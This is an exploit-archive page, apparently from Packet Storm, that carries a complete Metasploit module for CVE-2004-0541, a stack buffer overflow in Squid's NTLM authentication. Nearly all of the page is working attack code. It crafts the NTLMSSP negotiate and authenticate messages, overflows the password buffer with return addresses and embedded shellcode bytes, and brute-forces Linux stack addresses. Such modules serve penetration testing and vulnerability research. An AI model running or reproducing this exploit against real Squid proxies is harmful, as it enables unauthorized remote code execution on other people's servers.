what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Squid NTLM Authenticate Overflow

Squid NTLM Authenticate Overflow
Posted Oct 27, 2009
Authored by skape

This is an exploit for Squid's NTLM authenticate overflow (libntlmssp.c). Due to improper bounds checking in ntlm_check_auth, it is possible to overflow the 'pass' variable on the stack with user controlled data of a user defined length.

tags | exploit, overflow
advisories | CVE-2004-0541
SHA-256 | c43f943216a1703933afd0ce0708c0542f099b2ad7ed5a159c445291d16c2bc5

Squid NTLM Authenticate Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Brute
include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Squid NTLM Authenticate Overflow',
'Description' => %q{
This is an exploit for Squid's NTLM authenticate overflow
(libntlmssp.c). Due to improper bounds checking in
ntlm_check_auth, it is possible to overflow the 'pass'
variable on the stack with user controlled data of a user
defined length. Props to iDEFENSE for the advisory.
},
'Author' => 'skape',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-0541'],
[ 'OSVDB', '6791'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=107'],
[ 'BID', '10500'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 256,
'MinNops' => 16,
'Prepend' => "\x31\xc9\xf7\xe1\x8d\x58\x0e\xb0\x30\x41\xcd\x80",
'PrependEncoder' => "\x83\xec\x7f",

},
'Targets' =>
[
[ 'Linux Bruteforce',
{
'Platform' => 'linux',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c },
'Stop' => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc },
'Step' => 0
}
},
],
],
'DisclosureDate' => 'Jun 8 2004',
'DefaultTarget' => 0))

register_advanced_options(
[
# We must wait 15 seconds between each attempt so as to prevent
# squid from exiting completely after 5 crashes.
OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 15 ]),
], self.class)
end

def brute_exploit(addresses)
site = "http://" + rand_text_alpha(rand(128)) + ".com"

print_status("Trying 0x#{"%.8x" % addresses['Ret']}...")
connect

trasnmit_negotiate(site)
transmit_authenticate(site, addresses)

handler
disconnect
end

def trasnmit_negotiate(site)
negotiate =
"NTLMSSP\x00" + # NTLMSSP identifier
"\x01\x00\x00\x00" + # NTLMSSP_NEGOTIATE
"\x07\x00\xb2\x07" + # flags
"\x01\x00\x09\x00" + # workgroup len/max (1)
"\x01\x00\x00\x00" + # workgroup offset (1)
"\x01\x00\x03\x00" + # workstation len/max (1)
"\x01\x00\x00\x00" # workstation offset (1)

print_status("Sending NTLMSSP_NEGOTIATE (#{negotiate.length} bytes)")
req =
"GET #{site} HTTP/1.1\r\n" +
"Proxy-Connection: Keep-Alive\r\n" +
"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\r\n" +
"\r\n"
sock.put(req)

end

def transmit_authenticate(site, addresses)
overflow =
rand_text_alphanumeric(0x20) +
[addresses['Ret']].pack('V') +
[addresses['Valid']].pack('V') +
"\xff\x00\x00\x00"
shellcode = payload.encoded
pass_len = [overflow.length + shellcode.length].pack('v')
authenticate =
"NTLMSSP\x00" + # NTLMSSP identifier
"\x03\x00\x00\x00" + # NTLMSSP_AUTHENTICATE
pass_len + pass_len + # lanman response len/max
"\x38\x00\x00\x00" + # lanman response offset (56)
"\x01\x00\x01\x00" + # nt response len/max (1)
"\x01\x00\x00\x00" + # nt response offset (1)
"\x01\x00\x01\x00" + # domain name len/max (1)
"\x01\x00\x00\x00" + # domain name offset (1)
"\x01\x00\x01\x00" + # user name (1)
"\x01\x00\x00\x00" + # user name offset (1)
"\x00\x00\x00\x00" + # session key
"\x8b\x00\x00\x00" + # session key
"\x06\x82\x00\x02" + # flags
overflow + shellcode

print_status("Sending NTLMSSP_AUTHENTICATE (#{authenticate.length} bytes)")
req =
"GET #{site} HTTP/1.1\r\n" +
"Proxy-Connection: Keep-Alive\r\n" +
"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(authenticate)}\r\n" +
"\r\n"
sock.put(req)
end

end

Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close